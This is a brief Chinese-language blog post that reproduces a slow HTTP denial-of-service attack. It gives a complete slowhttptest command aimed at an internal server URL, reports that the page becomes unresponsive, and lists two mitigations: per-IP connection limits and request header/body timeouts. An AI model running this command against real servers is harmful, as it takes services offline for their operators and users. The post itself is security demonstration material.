慢速HTTP拒接服务攻击(DoS)复现
kali linux下有个神奇的工具叫“slowhttptest”
命令:slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://10.210.6.69:8081/nmc -x 24 -p
在进行慢速DOS攻击期间打开相应页面服务器会响应缓慢或直接无法响应:
修补的方案:
1、限制单机ip的连接数。
2、限制http request header/body 的超时时间
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!